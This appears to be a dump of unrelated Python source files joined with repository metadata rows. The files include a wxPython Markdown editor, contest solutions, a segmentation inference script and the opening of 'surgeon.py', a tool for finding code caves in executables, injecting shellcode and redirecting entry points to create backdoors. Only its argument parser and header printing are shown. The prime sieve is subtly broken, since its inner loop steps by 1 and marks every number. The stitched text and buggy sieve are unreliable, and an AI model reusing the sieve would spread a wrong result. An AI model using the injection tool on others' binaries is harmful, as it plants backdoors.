OnSymbol_RightCurly = MathInserts.OnSymbol_RightCurly
OnAbsVal = MathInserts.OnAbsVal
OnMathBar = MathInserts.OnMathBar
OnSquareRoot = MathInserts.OnSquareRoot
OnFraction = MathInserts.OnFraction
OnSummation = MathInserts.OnSummation
Onintegral = MathInserts.Onintegral
OnProduct = MathInserts.OnProduct
OnLimit = MathInserts.OnLimit
OnDoubleSummation = MathInserts.OnDoubleSummation
OnDoubleIntegral = MathInserts.OnDoubleIntegral
OnGreek_alpha = MathInserts.OnGreek_alpha
OnGreek_beta = MathInserts.OnGreek_beta
OnGreek_gamma = MathInserts.OnGreek_gamma
OnGreek_delta = MathInserts.OnGreek_delta
OnGreek_epsilon = MathInserts.OnGreek_epsilon
OnGreek_varepsilon = MathInserts.OnGreek_varepsilon
OnGreek_zeta = MathInserts.OnGreek_zeta
OnGreek_eta = MathInserts.OnGreek_eta
OnGreek_theta = MathInserts.OnGreek_theta
OnGreek_vartheta = MathInserts.OnGreek_vartheta
OnGreek_iota = MathInserts.OnGreek_iota
OnGreek_kappa = MathInserts.OnGreek_kappa
OnGreek_lambda = MathInserts.OnGreek_lambda
OnGreek_mu = MathInserts.OnGreek_mu
OnGreek_nu = MathInserts.OnGreek_nu
OnGreek_xi = MathInserts.OnGreek_xi
OnGreek_omicron = MathInserts.OnGreek_omicron
OnGreek_pi = MathInserts.OnGreek_pi
OnGreek_rho = MathInserts.OnGreek_rho
OnGreek_sigma = MathInserts.OnGreek_sigma
OnGreek_tau = MathInserts.OnGreek_tau
OnGreek_upsilon = MathInserts.OnGreek_upsilon
OnGreek_phi = MathInserts.OnGreek_phi
OnGreek_chi = MathInserts.OnGreek_chi
OnGreek_psi = MathInserts.OnGreek_psi
OnGreek_omega = MathInserts.OnGreek_omega
OnMathRoundBrack = MathInserts.OnMathRoundBrack
OnMathCurlyBrack = MathInserts.OnMathCurlyBrack
OnMathSquareBrack = MathInserts.OnMathSquareBrack
# format menu events
def OnSquareBrack(self, event):
frm, to = self.editor.GetSelection()
self.editor.SetInsertionPoint(to)
self.editor.WriteText("]")
self.editor.SetInsertionPoint(frm)
self.editor.WriteText("[")
self.editor.SetInsertionPoint(to + 2)
def OnCurlyBrack(self, event):
frm, to = self.editor.GetSelection()
self.editor.SetInsertionPoint(to)
self.editor.WriteText("}")
self.editor.SetInsertionPoint(frm)
self.editor.WriteText("{")
self.editor.SetInsertionPoint(to + 2)
def OnRoundBrack(self, event):
frm, to = self.editor.GetSelection()
self.editor.SetInsertionPoint(to)
self.editor.WriteText(")")
self.editor.SetInsertionPoint(frm)
self.editor.WriteText("(")
self.editor.SetInsertionPoint(to + 2)
def OnMath(self, event):
frm, to = self.editor.GetSelection()
self.editor.SetInsertionPoint(to)
self.editor.WriteText("$")
self.editor.SetInsertionPoint(frm)
self.editor.WriteText("$")
self.editor.SetInsertionPoint(to + 2)
def OnItalic(self, event):
frm, to = self.editor.GetSelection()
self.editor.SetInsertionPoint(to)
self.editor.WriteText("*")
self.editor.SetInsertionPoint(frm)
self.editor.WriteText("*")
self.editor.SetInsertionPoint(to + 2)
def OnBold(self, event):
frm, to = self.editor.GetSelection()
self.editor.SetInsertionPoint(to)
self.editor.WriteText("**")
self.editor.SetInsertionPoint(frm)
self.editor.WriteText("**")
self.editor.SetInsertionPoint(to + 4)
def OnCode(self, event):
frm, to = self.editor.GetSelection()
self.editor.SetInsertionPoint(to)
self.editor.WriteText("`")
self.editor.SetInsertionPoint(frm)
self.editor.WriteText("`")
self.editor.SetInsertionPoint(to + 2)
def OnAddHeadBlock(self, event):
self.editor.SetInsertionPoint(0)
self.editor.WriteText('---\ntitle: ""\nauthor: ""\ndate: ""\noutput: html_document\n---\n')
self.editor.SetInsertionPoint(13)
def OnAddReference(self, event):
self.editor.WriteText(" [@ref] ")
def OnAddURL(self, event):
self.editor.WriteText(" [alt text](http://) ")
def OnAddEMail(self, event):
self.editor.WriteText(" [name](Mailto:) ")
def OnAddFigure(self, event):
self.editor.WriteText("  ")
def OnHeading1(self, event):
self.editor.WriteText("\n# ")
def OnHeading2(self, event):
self.editor.WriteText("\n## ")
def OnHeading3(self, event):
self.editor.WriteText("\n### ")
def OnHeading4(self, event):
self.editor.WriteText("\n#### ")
def OnHeading5(self, event):
self.editor.WriteText("\n##### ")
def OnHeading6(self, event):
self.editor.WriteText("\n###### ")
# view menu events
def ToggleStatusBar(self, event):
if self.statusbar.IsShown():
self.statusbar.Hide()
else:
self.statusbar.Show()
self.SetStatusText(SBText)
def OnClose(self, event):
self.settings['filename'] = self.filename
self.settings['lastdir'] = self.dirname
self.setSettings(self.settingsFile, self.settings)
if event.CanVeto() and self.editor.IsModified():
hold = wx.MessageBox("Would you like to save your work?",
"Save before exit?",
wx.ICON_QUESTION | wx.YES_NO | wx.CANCEL | wx.YES_DEFAULT)
if hold == wx.YES:
self.OnSave(event)
self.Destroy()
elif hold == wx.NO:
self.Destroy()
else:
event.Veto()
else:
self.Destroy()
def GetRDirectory(self):
def splitter(path, interest):
look = split(path)
if interest in look[1]:
return look[1]
if len(look[0]) == 0:
return None
return splitter(look[0], interest)
rscript = 'Rscript.exe'
warn = "Cannot find {} in default install location.".format(rscript)
version = "R-0.0.0"
choice = None
if "No settings file reference to settings":
if isdir("C:\\Program Files\\R"):
hold = "C:\\Program Files\\R"
elif isdir("C:\\Program Files (x86)\\R"):
hold = "C:\\Program Files (x86)\\R"
else:
print warn; return
options = [join(r, rscript) for r, d, f in walk(hold) if rscript in f]
printing('options', options)
if len(options) > 0:
choice = options[0]
for op in options[1:]:
vv = splitter(op, 'R-')
if vv >= version:
if 'x64' in op:
choice = op
version = vv
elif 'i386' in op and 'x64' not in choice:
choice = op
version = vv
elif 'i386' not in choice and 'x64' not in choice:
choice = op
version = vv
else:
print warn; return
else:
'something to get the information out of the settings file.'
return choice
def GetStartPosition(self):
self.x = self.x + 20
x = self.x
pt = self.ClientToScreen(wx.Point(0, 0))
return wx.Point(pt.x + x, pt.y + x)
def getSettings(self, filepath, settings):
try:
file = open(filepath, 'r')
sets = file.read()
file.close()
if len(sets) > 0:
sets = dcf_loads(sets)
assert (set(settings.keys()) == set(sets.keys()))
return sets
except:
pass
return self.setSettings(filepath, settings)
def setSettings(self, filepath, settings):
file = open(filepath, 'w')
file.write(dcf_dumps(settings))
file.close()
return settings
def OnSettings(self, event):
wx.MessageBox("You wanted to see the settings")
def OnShowFindToFix(self, event):
wx.MessageBox("This feature is not fully implemented as yet.")
def OnShowFindReplaceToFix(self, event):
wx.MessageBox("This feature is not fully implemented as yet.")
def OnShowFind(self, event):
data = wx.FindReplaceData()
dlg = wx.FindReplaceDialog(self, data, "Find")
dlg.data = data # save a reference to it...
dlg.Show(True)
def OnShowFindReplace(self, event):
data = wx.FindReplaceData()
dlg = wx.FindReplaceDialog(self, data, "Find & Replace", wx.FR_REPLACEDIALOG)
dlg.data = data # save a reference to it...
dlg.Show(True)
def OnFind(self, event):
map = {
wx.wxEVT_COMMAND_FIND : "FIND",
wx.wxEVT_COMMAND_FIND_NEXT : "FIND_NEXT",
wx.wxEVT_COMMAND_FIND_REPLACE : "REPLACE",
wx.wxEVT_COMMAND_FIND_REPLACE_ALL : "REPLACE_ALL",
}
et = event.GetEventType()
if et in map:
evtType = map[et]
else:
evtType = "**Unknown Event Type**"
if et in [wx.wxEVT_COMMAND_FIND_REPLACE, wx.wxEVT_COMMAND_FIND_REPLACE_ALL]:
replaceTxt = "Replace text: %s" % event.GetReplaceString()
else:
replaceTxt = ""
def OnFindClose(self, event):
event.GetDialog().Destroy()
# mandatory lines to get program running.
if __name__ == "__main__":
app = wx.App()
frame = MainWindow()
frame.Show()
app.MainLoop()
| [
"a.j.godfrey@massey.ac.nz"
] | a.j.godfrey@massey.ac.nz |
a4e44762a7511ec359dd8e19c070b721d03e6d4c | ce6fc44470dcb5fca78cdd3349a7be70d75f2e3a | /AtCoder/Panasonic 2020/C.py | df4a723d90f0c2af78b234c8e09df7cc7078f4ca | [] | no_license | cormackikkert/competitive-programming | f3fa287fcb74248ba218ecd763f8f6df31d57424 | 3a1200b8ff9b6941c422371961a127d7be8f2e00 | refs/heads/master | 2022-12-17T02:02:40.892608 | 2020-09-20T11:47:15 | 2020-09-20T11:47:15 | 266,775,265 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 137 | py | a, b, c = map(int, input().split())
if (c - a - b) >= 0 and 4 * a * b < (c - a - b) * (c - a - b):
print("Yes")
else:
print("No") | [
"u6427001@anu.edu.au"
] | u6427001@anu.edu.au |
308f47876d956e476994e9c9fe6924bde8b25f3c | 22e9d7c194cf22513d68b61b97c49405a47e8708 | /Number_Theory/sieves_primality_test.py | ef64fdf8d48dbf9a21543d0f6f5e2a11e959499b | [] | no_license | SandeepPadhi/Algorithmic_Database | 44c26f9300a99539781c5beb5587997b3ecadfe1 | ab8040a7dad94c84ec88f40e44b8520edcbe2443 | refs/heads/main | 2023-06-22T02:04:29.362315 | 2021-07-19T17:48:40 | 2021-07-19T17:48:40 | 338,329,340 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | import math
maxn=1000000
spf=[i for i in range(maxn+1)]
def sieve(spf):
for i in range(2,int(math.sqrt(maxn))+1,1):
if spf[i]==i:
for j in range(i*i,maxn+1):
spf[j]=i
def isPrime(x):
return True if spf[x]==x else False
sieve(spf)
print(isPrime(31)) | [
"padhisandeep96@gmail.com"
] | padhisandeep96@gmail.com |
3aca6340545fed7cbce0819167db2bb2462c2766 | 87d7eb0d93980ebdf655758ea608bd2f3fb9b126 | /detect.py | aeeadcc7ce600d0baf5adbb82cdb2bb26e8a8925 | [] | no_license | cheeeaaaters/FYP-flask | 73e1d4ba51d5c3dbdb59f21ace28e1ea6d35010e | 68d91a8de35cc77275d146e24b1c36296d5a68fb | refs/heads/master | 2021-04-10T05:20:44.910502 | 2020-04-14T08:32:37 | 2020-04-14T08:32:37 | 248,913,168 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,469 | py | import argparse
import scipy
import os
import numpy as np
import json
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision import transforms
from scipy import ndimage
from tqdm import tqdm
from math import ceil
from glob import glob
from PIL import Image
import dataloaders
import models
from utils.helpers import colorize_mask
from utils import palette
import time
import cv2
def pad_image(img, target_size):
rows_to_pad = max(target_size[0] - img.shape[2], 0)
cols_to_pad = max(target_size[1] - img.shape[3], 0)
padded_img = F.pad(img, (0, cols_to_pad, 0, rows_to_pad), "constant", 0)
return padded_img
def sliding_predict(model, image, num_classes, flip=True):
image_size = image.shape
tile_size = (int(image_size[2]//2.5), int(image_size[3]//2.5))
overlap = 1/3
stride = ceil(tile_size[0] * (1 - overlap))
num_rows = int(ceil((image_size[2] - tile_size[0]) / stride) + 1)
num_cols = int(ceil((image_size[3] - tile_size[1]) / stride) + 1)
total_predictions = np.zeros((num_classes, image_size[2], image_size[3]))
count_predictions = np.zeros((image_size[2], image_size[3]))
tile_counter = 0
for row in range(num_rows):
for col in range(num_cols):
x_min, y_min = int(col * stride), int(row * stride)
x_max = min(x_min + tile_size[1], image_size[3])
y_max = min(y_min + tile_size[0], image_size[2])
img = image[:, :, y_min:y_max, x_min:x_max]
padded_img = pad_image(img, tile_size)
tile_counter += 1
padded_prediction = model(padded_img)
if flip:
fliped_img = padded_img.flip(-1)
fliped_predictions = model(padded_img.flip(-1))
padded_prediction = 0.5 * (fliped_predictions.flip(-1) + padded_prediction)
predictions = padded_prediction[:, :, :img.shape[2], :img.shape[3]]
count_predictions[y_min:y_max, x_min:x_max] += 1
total_predictions[:, y_min:y_max, x_min:x_max] += predictions.data.cpu().numpy().squeeze(0)
total_predictions /= count_predictions
return total_predictions
def multi_scale_predict(model, image, scales, num_classes, device, flip=False):
input_size = (image.size(2), image.size(3))
upsample = nn.Upsample(size=input_size, mode='bilinear', align_corners=True)
total_predictions = np.zeros((num_classes, image.size(2), image.size(3)))
image = image.data.data.cpu().numpy()
for scale in scales:
scaled_img = ndimage.zoom(image, (1.0, 1.0, float(scale), float(scale)), order=1, prefilter=False)
scaled_img = torch.from_numpy(scaled_img).to(device)
scaled_prediction = upsample(model(scaled_img).cpu())
if flip:
fliped_img = scaled_img.flip(-1).to(device)
fliped_predictions = upsample(model(fliped_img).cpu())
scaled_prediction = 0.5 * (fliped_predictions.flip(-1) + scaled_prediction)
total_predictions += scaled_prediction.data.cpu().numpy().squeeze(0)
total_predictions /= len(scales)
return total_predictions
def save_images(image, mask, output_path, image_file, palette, original_size, output=None):
# Saves the image, the model output and the results after the post processing
zero_pad = 256 * 3 - len(palette)
for i in range(zero_pad):
palette.append(0)
w, h = image.size
if original_size:
w, h =original_size
if output:
print(mask.shape)
resize_mask = cv2.resize(mask, dsize=original_size, interpolation=cv2.INTER_NEAREST)
print(resize_mask.shape)
pc_0 = int(np.count_nonzero(resize_mask==0))
pc_1 = int(np.count_nonzero(resize_mask==1))
pc_2 = int(np.count_nonzero(resize_mask==2))
pc_3 = int(np.count_nonzero(resize_mask==3))
pc_total = pc_0 + pc_1 + pc_2 + pc_3
output["pc_0"] = pc_0
output["pc_1"] = pc_1
output["pc_2"] = pc_2
output["pc_3"] = pc_3
output["pc_total"] = pc_total
image_file = os.path.basename(image_file).split('.')[0]
colorized_mask = colorize_mask(mask, palette)
if image.size != original_size:
image = image.resize(size=original_size, resample=Image.BILINEAR)
if colorized_mask.size != original_size:
colorized_mask = colorized_mask.resize(size=original_size, resample=Image.NEAREST)
blend = Image.blend(image, colorized_mask.convert('RGB'), 0.5)
mask_path = os.path.join(output_path, image_file+'.png')
colorized_mask.save(mask_path)
output_im = Image.new('RGB', (w*3, h))
output_im.paste(image, (0,0))
output_im.paste(colorized_mask, (w*1,0))
output_im.paste(blend, (w*2,0))
blend_path = os.path.join(output_path, image_file+'_colorized.png')
output_im.save(blend_path)
if output:
output['mask'] = mask_path
output['blend'] = blend_path
# mask_img = Image.fromarray(mask, 'L')
# mask_img.save(os.path.join(output_path, image_file+'.png'))
def main():
args = parse_arguments()
print(args)
config = json.load(open(args.config))
# Dataset used for training the model
dataset_type = config['train_loader']['type']
loader = getattr(dataloaders, config['train_loader']['type'])(**config['train_loader']['args'])
to_tensor = transforms.ToTensor()
#normalize = transforms.Normalize(loader.MEAN, loader.STD)
num_classes = loader.dataset.num_classes
palette = loader.dataset.palette
base_size = loader.dataset.base_size
# Model
model = getattr(models, config['arch']['type'])(num_classes, **config['arch']['args'])
availble_gpus = list(range(torch.cuda.device_count()))
device = torch.device('cuda:0' if len(availble_gpus) > 0 else 'cpu')
checkpoint = torch.load(args.model)
if isinstance(checkpoint, dict) and 'state_dict' in checkpoint.keys():
checkpoint = checkpoint['state_dict']
if 'module' in list(checkpoint.keys())[0] and not isinstance(model, torch.nn.DataParallel):
model = torch.nn.DataParallel(model)
model.load_state_dict(checkpoint)
model.to(device)
model.eval()
#test
if args.half:
model=model.half()
if not os.path.exists('outputs'):
os.makedirs('outputs')
image_files = sorted(glob(os.path.join(args.images, f'*.{args.extension}')))
with torch.no_grad():
tbar = tqdm(image_files, ncols=100)
Total_Inference_Time=0
for img_file in tbar:
image = Image.open(img_file).convert('RGB')
original_size=image.size
if base_size:
image = image.resize(size=(base_size, base_size), resample=Image.BILINEAR)
#input = normalize(to_tensor(image)).unsqueeze(0)
input = to_tensor(image).unsqueeze(0)
if args.half:
input = input.half()
ticks = time.time()
if args.mode == 'multiscale':
prediction = multi_scale_predict(model, input, scales, num_classes, device)
elif args.mode == 'sliding':
prediction = sliding_predict(model, input, num_classes)
else:
prediction = model(input.to(device))
Total_Inference_Time += time.time()-ticks
if config['arch']['type'][:2] == 'IC':
prediction = prediction[0]
elif config['arch']['type'][-3:] == 'OCR':
prediction = prediction[0]
elif config['arch']['type'][:3] == 'Enc':
prediction = prediction[0]
elif config['arch']['type'][:5] == 'DANet':
prediction = prediction[0]
if args.half:
prediction = prediction.squeeze(0).float().cpu().numpy()
else:
prediction = prediction.squeeze(0).cpu().numpy()
prediction = F.softmax(torch.from_numpy(prediction), dim=0).argmax(0).cpu().numpy()
save_images(image, prediction, args.output, img_file, palette, original_size)
print("time used: {}".format(Total_Inference_Time))
def process(trays, backref=False):
root = os.path.dirname(__file__)
train_loader_type = "TM2"
train_loader_args = {
"data_dir": "/home/ubuntu/TM2",
"batch_size": 8,
"base_size": 512,
"crop_size": False,
"augment": True,
"shuffle": True,
"scale": False,
"flip": False,
"rotate": False,
"blur": False,
"split": "train",
"num_workers": 8
}
arch_type = "HRNetV2_OCR"
arch_args = {
"backbone": "resnet18",
"freeze_bn": False,
"freeze_backbone": False
}
args = {
"mode": "normal",
"model": "/home/ubuntu/FYP-Seg/weights/checkpoint-epoch250.pth",
"half": False,
"output": "outputs"
}
# Dataset used for training the model
#dataset_type = train_loader_type
#loader = getattr(dataloaders, train_loader_type)(**train_loader_args)
to_tensor = transforms.ToTensor()
#normalize = transforms.Normalize(loader.MEAN, loader.STD)
num_classes = 4
pal = palette.COCO_palette
base_size = train_loader_args["base_size"]
# Model
model = getattr(models, arch_type)(num_classes, **arch_args)
availble_gpus = list(range(torch.cuda.device_count()))
device = torch.device('cuda:0' if len(availble_gpus) > 0 else 'cpu')
checkpoint = torch.load(args['model'])
if isinstance(checkpoint, dict) and 'state_dict' in checkpoint.keys():
checkpoint = checkpoint['state_dict']
if 'module' in list(checkpoint.keys())[0] and not isinstance(model, torch.nn.DataParallel):
model = torch.nn.DataParallel(model)
model.load_state_dict(checkpoint)
model.to(device)
model.eval()
#test
if args['half']:
model=model.half()
output_dir = os.path.join(root, args['output'])
if not os.path.exists(output_dir):
os.makedirs(output_dir)
with torch.no_grad():
tbar = tqdm(trays, ncols=100)
Total_Inference_Time=0
for c, img_file in enumerate(tbar):
output = {
"mask": None,
"blend": None,
"percentage": (c+1)/len(trays),
"infer_time": 0,
"pc_0": 0,
"pc_1": 0,
"pc_2": 0,
"pc_3": 0,
"pc_total": 0
}
image = Image.open(img_file.path).convert('RGB')
original_size=image.size
if base_size:
image = image.resize(size=(base_size, base_size), resample=Image.BILINEAR)
#input = normalize(to_tensor(image)).unsqueeze(0)
input = to_tensor(image).unsqueeze(0)
if args['half']:
input = input.half()
ticks = time.time()
if args['mode'] == 'multiscale':
prediction = multi_scale_predict(model, input, scales, num_classes, device)
elif args['mode'] == 'sliding':
prediction = sliding_predict(model, input, num_classes)
else:
prediction = model(input.to(device))
output["infer_time"] = time.time()-ticks
Total_Inference_Time += output["infer_time"]
if arch_type[:2] == 'IC':
prediction = prediction[0]
elif arch_type[-3:] == 'OCR':
prediction = prediction[0]
elif arch_type[:3] == 'Enc':
prediction = prediction[0]
elif arch_type[:5] == 'DANet':
prediction = prediction[0]
if args['half']:
prediction = prediction.squeeze(0).float().cpu().numpy()
else:
prediction = prediction.squeeze(0).cpu().numpy()
prediction = F.softmax(torch.from_numpy(prediction), dim=0).argmax(0).cpu().numpy()
save_images(image, prediction, output_dir, img_file.path, pal, original_size, output)
yield (img_file, output) if backref else output
print("time used: {}".format(Total_Inference_Time))
def parse_arguments():
parser = argparse.ArgumentParser(description='Inference')
parser.add_argument('-c', '--config', default='VOC',type=str,
help='The config used to train the model')
parser.add_argument('-mo', '--mode', default='normal', type=str,
help='Mode used for prediction: either [multiscale, sliding]')
parser.add_argument('-m', '--model', default='model_weights.pth', type=str,
help='Path to the .pth model checkpoint to be used in the prediction')
parser.add_argument('-i', '--images', default=None, type=str,
help='Path to the images to be segmented')
parser.add_argument('--half', action='store_true', help='half precision FP16 inference')
parser.add_argument('-o', '--output', default='outputs', type=str,
help='Output Path')
parser.add_argument('-e', '--extension', default='png', type=str,
help='The extension of the images to be segmented')
args = parser.parse_args()
return args
if __name__ == '__main__':
main()
| [
"34884084+cheeeaaaters@users.noreply.github.com"
] | 34884084+cheeeaaaters@users.noreply.github.com |
17925adfde5c2e4b82469e2273c03496c752f669 | e2f8e247dc3cd6e8e3751d981e2571860cfa9221 | /Chapter59/using_tracemalloc.py | 7c6cd0d695f8d92395358c4a8ee1a21c37fbc044 | [] | no_license | wlstjdpark/EffectivePython | cefe31b6fd797740dc2a29ef6ccb01a52cfb10b5 | 8b2945ba550bc51c070a0d3629e7735523dcd94e | refs/heads/master | 2021-01-17T08:26:58.922106 | 2018-06-11T14:30:21 | 2018-06-11T14:30:21 | 68,527,668 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 611 | py | import tracemalloc
tracemalloc.start(10) # 스택 프레임을 최대 10개까지 저장
time1 = tracemalloc.take_snapshot()
import waste_memory
x = waste_memory.run()
time2 = tracemalloc.take_snapshot()
stats = time2.compare_to(time1, 'lineno')
for stat in stats[:3]:
print(stat)
# with trace
import tracemalloc
tracemalloc.start(10) # 스택 프레임을 최대 10개까지 저장
time1 = tracemalloc.take_snapshot()
import waste_memory
x = waste_memory.run()
time2 = tracemalloc.take_snapshot()
stats = time2.compare_to(time1, 'traceback')
top = stats[0]
print('\n'.join(top.traceback.format()))
| [
"PaRk119*86*"
] | PaRk119*86* |
10f81199000f82116d3cd541a9da66c52ed703c4 | 15e739894042aa6df7fc005e4f157b6d9e34a3df | /alembic/versions/88de3fba4b96_.py | e5ce43293de6e407c916e6269adb52fe88d02a58 | [
"MIT"
] | permissive | chalupaul/twitch_dungeon | 605b3b445d402f4d063177e5768b948885d6e69a | 97af4a73c8e99d2e5f1f1880e67e3253e0e06582 | refs/heads/main | 2023-01-07T15:50:08.189346 | 2020-10-24T20:38:39 | 2020-10-24T20:38:39 | 306,485,662 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 553 | py | """empty message
Revision ID: 88de3fba4b96
Revises: 0a91fb858408
Create Date: 2020-10-24 15:27:06.106894
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '88de3fba4b96'
down_revision = '0a91fb858408'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
| [
"me@chalupaul.com"
] | me@chalupaul.com |
ffd233d071341151366c88d28462a6473f4c2d0e | b22e672ca597c8277d593d993f74f260b0e62805 | /shellscripts/saveFoutputStruct.py | 723e7206464df44e91a202af08c5b82d74f96f5a | [] | no_license | simonsandell/thesis-project | 967d06ada68c77d570f154b25480868f367f4f77 | 16cc612fda2c9a101f6f5973f1e008923ed07360 | refs/heads/master | 2022-12-12T02:10:09.862114 | 2018-09-07T08:58:29 | 2018-09-07T08:58:29 | 286,031,386 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 282 | py | import os
import sys
res = [];
for direc,subdir,files in os.walk(sys.argv[1]):
dop = False;
for f in files:
if ".dat" in f:
dop = True;
if dop:
res.append(direc);
of = open("./foutput_struct.fst","w");
for ln in res:
of.write(ln+"\n");
| [
"simonsandell@live.se"
] | simonsandell@live.se |
efea246218ff9b5d4ceb471c7374571b916bb316 | 8a346638410159b27c5c107cac52a5a2258b5bec | /tree/leetcode_house robber_III.py | 7ac9928e566baa6ed2787addc33daf7321a888e9 | [] | no_license | psy2013GitHub/dsa | e3c45cce7cf314050b190e9acecdbc05a3bf9d99 | e7b1dcc8b8a33bbe705d9ce348c75ea2474761c4 | refs/heads/master | 2020-12-24T10:31:25.524278 | 2017-01-17T15:18:51 | 2017-01-17T15:18:51 | 73,148,390 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 888 | py | #-*- encoding: utf8 -*-
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def rob(self, root):
"""
:type root: TreeNode
:rtype: int
recur unit:
root
/ \
left right
/ \ / \
l.l l.r r.l r.r
return max(root.val + ll + lr + rl + rr, left + right)
"""
return self.helper(root, [0,], [0,])
def helper(self, root, l, r):
if not root:
return
ll, lr, rl, rr = [0,], [0,], [0,], [0,]
l[0] = self.helper(root.left, ll, lr)
r[0] = self.helper(root.right, rl, rr)
return max(root.val + ll[0] + lr[0] + rl[0] + rr[0], l[0] + r[0]) | [
"superdengzhou@163.com"
] | superdengzhou@163.com |
551b5e5c885e1a602f585c7ee7bb8b4c1fdb63b0 | 4900ca16320382567af96fa1fbe9f73f81d59404 | /surgeon.py | e13724b715e4ac07c85c7039b7dd9117b0fa5bc5 | [] | no_license | OmegaPointZero/Surgeon | 16515d488bd6eb4358fd487463b1d94a0f5c0317 | dc057ceae03fdcc99e1554913f2591d9504ebd5b | refs/heads/master | 2021-11-24T07:59:18.571451 | 2019-06-14T09:28:53 | 2019-06-14T09:28:53 | 191,914,811 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,385 | py | import re
import io
import elf
import bin as binr
import argparse
import pe
import sys
bs = binr.bin2str
elfh = elf.parseELFHeader
elfs = elf.parseSectionHeaderTable
peh = pe.parsePEHeader
pes = pe.parsePESectionsHeaderTable
args = sys.argv

parser = argparse.ArgumentParser(description='Parse and modify executables, find codecaves, and create backdoors')
# NOTE: the original passed each short/long pair as ONE option string
# (e.g. '-f, --file'), which argparse registers as a single literal flag
# named "-f, --file" -- so neither -f nor --file actually worked.  Each
# pair is now passed as two separate option strings.
# File we're working with
parser.add_argument('-f', '--file', action='store', default="", dest='file_path', help='Location of file to search for code cave in (absolute path)')
# Options for if we're searching for code caves
parser.add_argument('-d', '--file-headers', action='store_true', dest='fh', help='Show File Headers')
parser.add_argument('-s', '--section-headers', action='store_true', dest='sh', help='Show enumerated section headers')
parser.add_argument('-S', '--search', action='store', dest='search', help='Section to search for code cave inside of')
parser.add_argument('-X', action='store_true', dest='allEx', help='Search all executable sections')
parser.add_argument('-A', action='store_true', dest='allSec', help='Search all sections')
parser.add_argument('-l', '--length', action='store', default='64', dest='length', help='Number of bytes that constitutes a cave (default 64)')
parser.add_argument('-b', '--byte', action='store', default='0x00', dest='byte', help='Byte to be searching for.')
# Options for injecting shellcode
parser.add_argument('-t', '--target-offset', action='store', dest='target', help='Target offset to inject shellcode')
parser.add_argument('-j', action='store', dest='injection_file', help='A file of raw bytes to inject')
parser.add_argument('-J', action='store', dest='injection_string', help='A string of raw bytes to inject supplied like \\xef\\xeb')
parser.add_argument('-P', action='store_true', dest='permissions', help='Include this flag to have caveman verify shellcode fits in the code cave, and modifies permissions of the section to allow for code execution')
parser.add_argument('-E', action='store_true', dest='autoentry', help='Changes entry point of the executable to the target offset')
parser.add_argument('-e', action='store', dest='epoints', help='Changes entry point of the executable to a custom defined offset')
results = parser.parse_args()
class bcolors:
    # ANSI SGR escape sequences used to colorize the console tables below.
    HEADER = '\033[97m'   # bright white
    LB = '\033[96m'       # bright cyan ("light blue")
    PR = '\033[95m'       # bright magenta ("purple")
    OKBLUE = '\033[94m'   # bright blue
    OKGREEN = '\033[92m'  # bright green
    WARNING = '\033[93m'  # bright yellow
    FAIL = '\033[91m'     # bright red
    TEST = '\033[89m'     # NOTE(review): 89 is not a standard SGR code -- confirm intent
    ENDC = '\033[0m'      # reset all attributes
# Table-row helpers: lstr pads a plain row to 86 chars between pipe borders;
# sstr pads a 40-char colored cell and closes it back in the header color.
lstr = lambda string: "|" + "{:<86}".format(string) + "|"
sstr = lambda string, color: bcolors.HEADER+ "|" + color + "{:<40}".format(string) + bcolors.HEADER + "|"
# Horizontal rule printed between table rows.
divisor = bcolors.HEADER+ "+--------------------------------------------------------------------------------------+" +bcolors.ENDC
# Startup banner (Python 2 print statement).
print bcolors.HEADER + "Surgeon - The Binary Pwning Tool\n\n"
def getFileType(target_file):
    """Identify the executable format of target_file by its magic bytes.

    Returns "ELF" for ELF binaries, "PE" for PE/COFF binaries, or None
    when the magic number is not recognized.
    """
    # 'with' guarantees the handle is closed on every path; the original
    # leaked the file handle when neither magic matched.
    with io.open(target_file, 'rb') as bfile:
        magic = bfile.read(4)
    # Compare against bytes literals so the check works whether read()
    # returned str (Python 2) or bytes (Python 3).
    if magic[:4] == b"\x7fELF":
        return "ELF"
    elif magic[:2] == b"\x4d\x5a":  # "MZ" DOS stub header
        return "PE"
    return None
def parseExecHeader(a, path, fh):
a = a.upper()
if a == "ELF":
p = elfh(path,fh)
return p
elif a == "PE":
p = peh(path,fh)
return p
else:
print "Invalid file type %s" % a
return 0
def sectionsOverView(sections,btype):
    """Pretty-print the parsed section header table of an ELF or PE binary.

    `sections` is the list of per-section dicts produced by the format
    parser; `btype` ("ELF" or "PE") selects the column layout.  Purely
    console output; returns nothing.
    """
    print bcolors.FAIL + "\nSection Headers: " + bcolors.HEADER
    print divisor
    if btype == "ELF":
        # Two header rows: name/type/addr/offset, then size/entsize/flags/alignment.
        print "%s| %s[Number] %s%s %s%s %s%s %s%s%s |" % (bcolors.HEADER, bcolors.FAIL, bcolors.HEADER, "{:<18}".format('Name'),bcolors.OKGREEN, "{:<18}".format('Type'), bcolors.LB, "{:<18}".format('Addr'), bcolors.OKBLUE,"{:<18}".format('Offset'),bcolors.HEADER )
        print "%s| %s%s %s%s %sFlags %sAlignment |" % (bcolors.HEADER,bcolors.PR,"{:<18}".format('Size'),bcolors.WARNING, "{:<18}".format('EntSize'), bcolors.FAIL, bcolors.HEADER )
        print divisor
        for x in range(0,len(sections)):
            section = sections[x]
            # Zero-pad single-digit hex indices so "0x5" renders as "0x05".
            y = hex(x)
            if len(y) < 4:
                y = "0x0" + y[-1]
            # Each section is printed as two colorized rows followed by a rule.
